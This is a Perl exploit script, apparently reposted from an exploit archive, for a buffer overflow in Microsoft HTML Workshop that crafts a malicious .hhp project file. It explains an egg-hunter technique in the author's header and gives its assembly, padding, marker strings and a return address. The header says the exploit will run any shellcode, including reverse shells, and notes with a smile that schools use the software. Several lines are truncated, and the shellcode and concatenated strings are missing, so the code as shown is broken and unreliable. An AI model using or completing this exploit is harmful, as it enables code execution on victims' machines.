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Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit

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Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit

# Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
# -----------------------------------------------------------------
# Discovered/Exploit by SkD                    (skdrat@hotmail.com)
# -----------------------------------------------------------------
# This is a continuation of my new method, shellhunting.
# The exploit is far more advanced than the Amaya's as it runs on
# every system, partly because the shellhunter itself is very much
# reliable and universal.
# The shellhunter does the following tasks to find and exec.
# shellcode:-
# 1- Searches through the whole memory of the application.
# 2- Installs a SEH handler so on access violations it won't
#    stop hunting for the shellcode.
# 3- Repairs stack so a stack overflow won't occur (that is what
#    happens when the SEH is called up, many PUSH instructions
#    are called from the relevant modules (ntdll, etc).
# 4- Improved speed by searching through 32 bytes at a time.
# 5- Uses a certain address in memory to store a variable for the
#    search.
# It is very stable and will allow any shellcode (bind/reverse shell,
# dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
# Yeah, I guess that's about it. Took me a few hours to figure out the
# whole thing but nothing is impossible ;).
# Oh, I think some schools use this software :) (it's Microsoft's, right?).
# You can download the app. from Microsoft's official page:
# ->  http://msdn.microsoft.com/en-us/library/ms669985.aspx
# If you are interested in my method and want to learn something new or
# improve your exploitation skills then visit my team's blog at:
# ->  http://abysssec.com
# Peace out,
# SkD.

my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
my $crlf      = "\x0d\x0a";

# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my $shellcode =

#/----------------Advanced Shellhunter Code----------------\
#01D717DD   EB 1E            JMP SHORT 01D717FD            |
#01D717DF   83C4 64          ADD ESP,64                    |
#01D717E2   83C4 64          ADD ESP,64                    |
#01D717E5   83C4 64          ADD ESP,64                    |
#01D717E8   83C4 64          ADD ESP,64                    |
#01D717EB   83C4 64          ADD ESP,64                    |
#01D717EE   83C4 64          ADD ESP,64                    |
#01D717F1   83C4 64          ADD ESP,64                    |
#01D717F4   83C4 64          ADD ESP,64                    |
#01D717F7   83C4 64          ADD ESP,64                    |
#01D717FA   83C4 54          ADD ESP,54                    |
#01D717FD   33FF             XOR EDI,EDI                   |
#01D717FF   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
#01D71804   8B3A             MOV EDI,DWORD PTR DS:[EDX]    |
#01D71806   EB 0E            JMP SHORT 01D71816            |
#01D71808   58               POP EAX                       |
#01D71809   83E8 3C          SUB EAX,3C                    |
#01D7180C   50               PUSH EAX                      |
#01D7180D   6A FF            PUSH -1                       |
#01D7180F   33DB             XOR EBX,EBX                   |
#01D71811   64:8923          MOV DWORD PTR FS:[EBX],ESP    |
#01D71814   EB 05            JMP SHORT 01D7181B            |
#01D71816   E8 EDFFFFFF      CALL 01D71808                 |
#01D7181B   B8 12121212      MOV EAX,12121212              |
#01D71820   6BC0 02          IMUL EAX,EAX,2                |
#01D71823   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
#01D71828   83C7 20          ADD EDI,20                    |
#01D7182B   893A             MOV DWORD PTR DS:[EDX],EDI    |
#01D7182D   3907             CMP DWORD PTR DS:[EDI],EAX    |
#01D7182F  ^75 F7            JNZ SHORT 01D71828            |
#01D71831   83C7 04          ADD EDI,4                     |
#01D71834   6BC0 02          IMUL EAX,EAX,2                |
#01D71837   3907             CMP DWORD PTR DS:[EDI],EAX    |
#01D71839  ^75 E0            JNZ SHORT 01D7181B            |
#01D7183B   83C7 04          ADD EDI,4                     |
#01D7183E   B8 42424242      MOV EAX,42424242              |
#01D71843   3907             CMP DWORD PTR DS:[EDI],EAX    |
#01D71845  ^75 D4            JNZ SHORT 01D7181B            |
#01D71847   83C7 04          ADD EDI,4                     |
#01D7184A   FFE7             JMP EDI                       |
#\-----------------------End of Code----------------------/

my $shellhunter = "\xeb\x1e".
my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64;
my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64;
my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64;
my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64;
my $len = 280 - (length($shellhunter) + 55);
my $overflow1 = "\x41" x $len;
my $overflow2 = "\x41" x 55;
my $overflow3 = "\x42" x 256;
my $ret = "\x93\x1f\x40\x00"; #0x00401f93   CALL EDI [hhw.exe]

open(my $hhpprj_file, "> s.hhp");
print $hhpprj_file $hhp_data1.
close $hhpprj_file;

#  0day.today [2024-07-02]  #